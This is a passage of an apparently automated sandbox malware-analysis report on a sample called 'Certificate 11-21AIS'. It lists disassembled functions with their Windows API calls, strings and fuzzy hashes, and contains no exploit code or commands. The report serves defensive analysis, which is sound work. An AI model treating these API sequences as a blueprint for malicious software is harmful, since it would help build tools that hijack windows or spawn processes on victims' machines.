                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              • Opcode ID: 15efa94801ec2355031909c6f3770924a4b784eac6e997bd062ff96cb300c536
                                                                              • Instruction ID: 5fa4acee101e1f0d5d2a2d8aecf0edaf3fa9889562578aea2ef7d46d1dd395df
                                                                              • Opcode Fuzzy Hash: 15efa94801ec2355031909c6f3770924a4b784eac6e997bd062ff96cb300c536
                                                                              • Instruction Fuzzy Hash: 5921A479A00108AFDB04ABB4CC85EBEBB75FF4A310F104119F655D32D1DBB498159B20
                                                                              Function 008FB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008FBA73
                                                                              • GetDlgCtrlID.USER32 ref: 008FBA7E
                                                                              • GetParent.USER32 ref: 008FBA9A
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008FBA9D
                                                                              • GetDlgCtrlID.USER32(?), ref: 008FBAA6
                                                                              • GetParent.USER32(?), ref: 008FBAC2
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008FBAC5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              • Opcode ID: c0313676a2a07e80edbf90da9671ddfee04d4fc89f0fe960617d74fbc93d15e8
                                                                              • Instruction ID: ad76140e4243180e9c1cd9d263f60150febd49dca9850f773d3c8976b2ee4e38
                                                                              • Opcode Fuzzy Hash: c0313676a2a07e80edbf90da9671ddfee04d4fc89f0fe960617d74fbc93d15e8
                                                                              • Instruction Fuzzy Hash: 7021B3B9A01208BFDB05ABB4CC85EFEB775FF49300F144019F655D3191DB759915AB20
                                                                              Function 008FBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32 ref: 008FBAE3
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 008FBAF8
                                                                              • _wcscmp.LIBCMT ref: 008FBB0A
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008FBB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: ff2f402f0e3ab5d84fd4e236f254db0abdd187062e5e516e92c08268dfff0950
                                                                              • Instruction ID: f9a96f042333823610aade62875d62bae574acf9de066f82e93bb2a13792b0d0
                                                                              • Opcode Fuzzy Hash: ff2f402f0e3ab5d84fd4e236f254db0abdd187062e5e516e92c08268dfff0950
                                                                              • Instruction Fuzzy Hash: 9F11E37A60C34AF9FA246635DC06DB637ACFF52338B200022FA08E50D5FFA1A8615514
                                                                              Function 0091B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0091B2D5
                                                                              • CoInitialize.OLE32(00000000), ref: 0091B302
                                                                              • CoUninitialize.OLE32 ref: 0091B30C
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0091B40C
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0091B539
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0091B56D
                                                                              • CoGetObject.OLE32(?,00000000,0094D91C,?), ref: 0091B590
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0091B5A3
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0091B623
                                                                              • VariantClear.OLEAUT32(0094D91C), ref: 0091B633
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2395222682-0
                                                                              • Opcode ID: 8ea510b78ab0e75b830faa48f66f7e66f92968a32cb4c69feb3d8de9faf07881
                                                                              • Instruction ID: b02ab3c939fb81629955476ab283714c3db307ca66497f283b5f3ca42c36e3cf
                                                                              • Opcode Fuzzy Hash: 8ea510b78ab0e75b830faa48f66f7e66f92968a32cb4c69feb3d8de9faf07881
                                                                              • Instruction Fuzzy Hash: 76C12475608309AFC700DF68C884A6AB7EAFF89308F00495DF58ADB261DB71ED45CB52
                                                                              Function 009067E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 009067FD
                                                                              • __swprintf.LIBCMT ref: 0090680A
                                                                                • Part of subcall function 008E172B: __woutput_l.LIBCMT ref: 008E1784
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00906834
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00906840
                                                                              • LockResource.KERNEL32(00000000), ref: 0090684D
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0090686D
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0090687F
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0090688E
                                                                              • LockResource.KERNEL32(?), ref: 0090689A
                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009068F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 1433390588-0
                                                                              • Opcode ID: d2584d5edbda5e5a55db9be86fd16d905200a75827eee75b441b0f0b3fce1a39
                                                                              • Instruction ID: dff8c2729af128e7d5f2747c380f43e86c2ce04192e08efe641d798a99807786
                                                                              • Opcode Fuzzy Hash: d2584d5edbda5e5a55db9be86fd16d905200a75827eee75b441b0f0b3fce1a39
                                                                              • Instruction Fuzzy Hash: 1B318DB5A0521AAFDB109F61DD49EBE7BACFF09340F008425FD12E2190E774D921EBA0
                                                                              Function 00904025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00904047
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009030A5,?,00000001), ref: 0090405B
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00904062
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 00904071
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00904083
                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 0090409C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 009040AE
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 009040F3
                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904108
                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904113
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: cb2736dd2eeb6e4cb660cd7940373a3564e359d1f8cbfdfdff0994fb3b5ad26c
                                                                              • Instruction ID: 870180b61953a99959c3f28b6e19e82f179e323a30b4ad7277a83efd0a4c8b31
                                                                              • Opcode Fuzzy Hash: cb2736dd2eeb6e4cb660cd7940373a3564e359d1f8cbfdfdff0994fb3b5ad26c
                                                                              • Instruction Fuzzy Hash: 1E31BFB9518204BFDB20DB54DC85F7977BEABA5711F11C105FE04E62A0CBB4D9809B64
                                                                              Function 0093DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 008DB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 008DB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 008DB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 008DB4BD
                                                                              • GetClientRect.USER32(?), ref: 0093DD63
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0093DD7A
                                                                              • GetWindowDC.USER32(?), ref: 0093DD86
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0093DD95
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0093DDA7
                                                                              • GetSysColor.USER32(00000005), ref: 0093DDC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 3430376129-0
                                                                              • Opcode ID: 6939b0ef3193e64f8043285a23ffb2c2ce762ba34ba2644af60a4be1a538e25e
                                                                              • Instruction ID: ce79dc2688f161aa170fc92d90a4de3ae8e873e5453672342aefae471d1385f0
                                                                              • Opcode Fuzzy Hash: 6939b0ef3193e64f8043285a23ffb2c2ce762ba34ba2644af60a4be1a538e25e
                                                                              • Instruction Fuzzy Hash: 22118E39119205EFDB216FA4EC08FA93B66FB0A325F118621FA66951E2CB314941EF21
                                                                              Function 008FCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,008FCF50), ref: 008FCE90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: d05c7d1e3016aebe55c593016f023dd6c17781604ada7a11e546d7d64f98d6d2
                                                                              • Instruction ID: b3b67ea90a6cc9b3c5fdb10044e1f6b5f752baa6c96d14ddfdad8e63c9f63d9c
                                                                              • Opcode Fuzzy Hash: d05c7d1e3016aebe55c593016f023dd6c17781604ada7a11e546d7d64f98d6d2
                                                                              • Instruction Fuzzy Hash: 06918131A0060E9ACB18EF74C581BFAFBB5FF05304F50852AD659E7251DF30AA59CBA1
                                                                              Function 008C3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008C30DC
                                                                              • CoUninitialize.OLE32(?,00000000), ref: 008C3181
                                                                              • UnregisterHotKey.USER32(?), ref: 008C32A9
                                                                              • DestroyWindow.USER32(?), ref: 00935079
                                                                              • FreeLibrary.KERNEL32(?), ref: 009350F8
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00935125
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 469580280-3243417748
                                                                              • Opcode ID: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
                                                                              • Instruction ID: ce447778f5e8f56453ab55c4b365f539c050236e111a4da829d808efbd10218d
                                                                              • Opcode Fuzzy Hash: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
                                                                              • Instruction Fuzzy Hash: 8891F0342006028FC719EB28C895F68F3B8FF19304F5582ADE40AA7262DB31EE56CF45
                                                                              Function 008DCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 008DCC15
                                                                                • Part of subcall function 008DCCCD: GetClientRect.USER32(?,?), ref: 008DCCF6
                                                                                • Part of subcall function 008DCCCD: GetWindowRect.USER32(?,?), ref: 008DCD37
                                                                                • Part of subcall function 008DCCCD: ScreenToClient.USER32(?,?), ref: 008DCD5F
                                                                              • GetDC.USER32 ref: 0093D137
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0093D14A
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0093D158
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0093D16D
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0093D175
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0093D200
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: 77deed3660cadf11354174f317c37400382b9c61791f8dcd5ef7004cbe7bd246
                                                                              • Instruction ID: 5840a63f943b4fda5b3dd474b680a4f565d7bb0908b2c46dc4bc72007e7404d3
                                                                              • Opcode Fuzzy Hash: 77deed3660cadf11354174f317c37400382b9c61791f8dcd5ef7004cbe7bd246
                                                                              • Instruction Fuzzy Hash: 96712034405209DFCF25DFA4E890AAA3BB9FF48324F14422AFD559A2A6C7308C41DF50
                                                                              Function 009145C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009145FF
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0091462B
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0091466D
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00914682
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0091468F
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009146BF
                                                                              • InternetCloseHandle.WININET(00000000), ref: 00914706
                                                                                • Part of subcall function 00915052: GetLastError.KERNEL32(?,?,009143CC,00000000,00000000,00000001), ref: 00915067
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 1241431887-3916222277
                                                                              • Opcode ID: ce311b226567362ab40fe48eb03776fabc51c9d26d82b28e1a3cbee2ece714d3
                                                                              • Instruction ID: 3a2f853b14d376ed4930d364abaf4b39bbfe7535c1930a5f3145bb6872f0872b
                                                                              • Opcode Fuzzy Hash: ce311b226567362ab40fe48eb03776fabc51c9d26d82b28e1a3cbee2ece714d3
                                                                              • Instruction Fuzzy Hash: 8D417FB5601209BFEB019F50CC89FFB77ACFF4E358F004026FA059A181D7B499849BA4
                                                                              Function 0091B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0095DC00), ref: 0091B715
                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0095DC00), ref: 0091B749
                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0091B8C1
                                                                              • SysFreeString.OLEAUT32(?), ref: 0091B8EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                              • String ID:
                                                                              • API String ID: 560350794-0
                                                                              • Opcode ID: f26e8dac0c6daeb7dc030ffbad0f0da10ed05745f41df6de424406c7b3065932
                                                                              • Instruction ID: 7ea71265528cdfc1e317d2fc2ebe0978949d772755680b13b669e347c11cf51b
                                                                              • Opcode Fuzzy Hash: f26e8dac0c6daeb7dc030ffbad0f0da10ed05745f41df6de424406c7b3065932
                                                                              • Instruction Fuzzy Hash: 89F10A75A00209AFCF04DF94C894EEEB7BAFF89715F108499F915AB250DB31AE85CB50
                                                                              Function 009224D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009224F5
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00922688
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009226AC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009226EC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0092270E
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0092286F
                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009228A1
                                                                              • CloseHandle.KERNEL32(?), ref: 009228D0
                                                                              • CloseHandle.KERNEL32(?), ref: 00922947
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                              • String ID:
                                                                              • API String ID: 4090791747-0
                                                                              • Opcode ID: 67360f88420bf54610465e57c7a0e4e95f14ffb520eaa315b0e04ccc38b97fd0
                                                                              • Instruction ID: d163cf0c9d076aa878a2b15dba706fcd44fb5a4ea05c71e7568911d9a2f1a0cc
                                                                              • Opcode Fuzzy Hash: 67360f88420bf54610465e57c7a0e4e95f14ffb520eaa315b0e04ccc38b97fd0
                                                                              • Instruction Fuzzy Hash: 33D1AD35604210AFC714EF28D891B6ABBE5FF85310F14895DF9899B3A2DB30EC44CB52
                                                                              Function 0092B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0092B3F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: d8485e104ab3a60df4bea5db6755572030518940ac038da452e2b09dcca47d55
                                                                              • Instruction ID: ccf342021d0edbe2c0e9aaa122d280c7d81d7171f2c384172132019785308ddd
                                                                              • Opcode Fuzzy Hash: d8485e104ab3a60df4bea5db6755572030518940ac038da452e2b09dcca47d55
                                                                              • Instruction Fuzzy Hash: E451B134601224BBEF20AF28EC85FAD3BE8FB05314F244516F615DA2EAD775E9409B51
                                                                              Function 008DA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
